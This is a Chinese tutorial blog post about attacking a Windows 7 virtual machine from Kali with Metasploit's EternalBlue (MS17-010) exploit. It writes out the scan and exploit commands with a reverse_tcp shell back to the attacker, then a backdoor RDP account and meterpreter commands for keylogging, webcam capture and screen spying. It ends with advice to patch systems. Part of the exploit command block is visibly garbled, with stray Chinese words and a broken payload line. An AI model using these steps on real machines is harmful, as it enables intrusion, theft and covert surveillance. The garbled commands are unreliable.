当前位置: 首页 > Linux

Kali从入门到银手镯(三):使用Metasploit工具进行Win7渗透测试

时间:2023-04-06 18:33:53 Linux

现在很多用户还在使用Win7系统,虽然我个人非常喜欢Win7,也承认这是一个非常经典的系统。但Win7在今年1月份已经完全停止支持,这意味着它永远得不到安全更新和补丁。这对用户来说是一个很大的危险。如果可能,请使用最新版本的Win10,并及时更新安全补丁,保护电脑。今天就来看看如何使用Kali渗透Win7吧。这里使用的工具是大名鼎鼎的Metaspoit,它集成了大量的漏洞渗透工具。其中就有臭名昭著的永恒之蓝工具,利用了Windows系统的SMB漏洞,漏洞编号为MS17-010。其实具体原理我也不知道,你只要知道这些漏洞是很危险的就可以了。准备工作准备工作很简单,一个Win7虚拟机和一个Kali虚拟机就够了。为了让Kali成功渗透,Win7系统需要关闭防火墙。扫描漏洞首先在Kali中启动Metasploit框架。msfconsole启动成功后,应该会进入Metasploit工具的命令行,提示符为msf5。然后使用扫描工具扫描ms10-010漏洞,RHOSTS填写Win7虚拟机IP地址。msf5>useauxiliary/scanner/smb/smb_ms17_010msf5auxiliary(scanner/smb/smb_ms17_010)>setRHOSTS192.168.229.129msf5auxiliary(scanner/smb/smb_ms17_010)>exploit注意工具的运行结果,如果有输出类似绿框,则表示漏洞扫描成功,可以进行下一步的渗透工作。如果开启了Win7防火墙,则无法扫描漏洞。这也从另一个方面证明了防火墙的防护作用。渗透系统已经通过扫描确认了Win7系统存在漏洞,接下来自然是要通过相应的渗透工具进行渗透了。其中RHOSTS为远程IP,即Win7的IP地址,LHOSTS为本地Kali系统的IP地址。msf5辅助(扫描仪/smb/smb_ms17_010)>使用exploit/windows/smb/ms17_010_eternalbluemsf5exploit(windows/smb/ms17_010_eternalblue)>设置RHOSTS192.168.229.129msf5exploit(windows/smb/ms17_010_eternalxxx/6)>4setpayload/ms17_010_eternalblue)>4reverse_tcpmsf5exploit(windows/smb/ms17_010_eternalblue)>setLHOST192.168.229.131msf5exploit(windows/smb/ms17_010_eternalblue)>exploit稍等,如果渗透成功,会出现meterpreter提示。这时可以输入getuid命令查看当前系统用户。远程桌面穿透开启成功后,你就可以使用它来进行各种你喜欢的操作了。如果你想要更简单的东西,你可以打开远程桌面并直接控制目标计算机。启用RDP时,需要创建用户。meterpreter>runpost/windows/manage/enable_rdpUSERNAME=testPASSWORD=123456然后在Kali中打开一个新的终端,输入启动远程桌面的命令。rdesktop192.168.229.129并输入上面设置的用户名和密码连接到目标电脑。当然,这种方法的问题在于,由于Windows系统是单用户系统,当前登录的用户会看到远程桌面的登录提示,从而暴露了渗透者。后台监控其实如果渗透成功,进入meterpreter提示状态,就不需要那么麻烦了。因为meterpreter自带的命令非常多,包括上传文件、执行程序、监控键盘、鼠标、摄像头等,完全足以获取目标用户的任何信息。screenshot命令可以获取当前系统的截图。upload命令可以上传文件。这里我直接上传刚才的截图。上传目标位置在C:\Windows\System32。webcam_stream命令可以打开目标计算机的网络摄像头。screenshare可以实时查看用户当前屏幕内容。keyscan命令可以监听用户的键盘操作。最后,执行命令可以在目标计算机上执行任意程序。以上命令可以配合使用完成整个渗透过程,从各个方面获取目标用户信息。当然,通过本文的内容,相比大家,你也明白了系统漏洞对用户的危害有多大。为了尽量减少漏洞对我们的影响,建议大家始终使用最新版本的操作系统并及时更新安全补丁,不要关闭更新和防火墙,安装并确保杀毒软件正常运行,并且不要运行奇怪的程序。这在很大程度上可以防止不法分子侵入我们的计算机。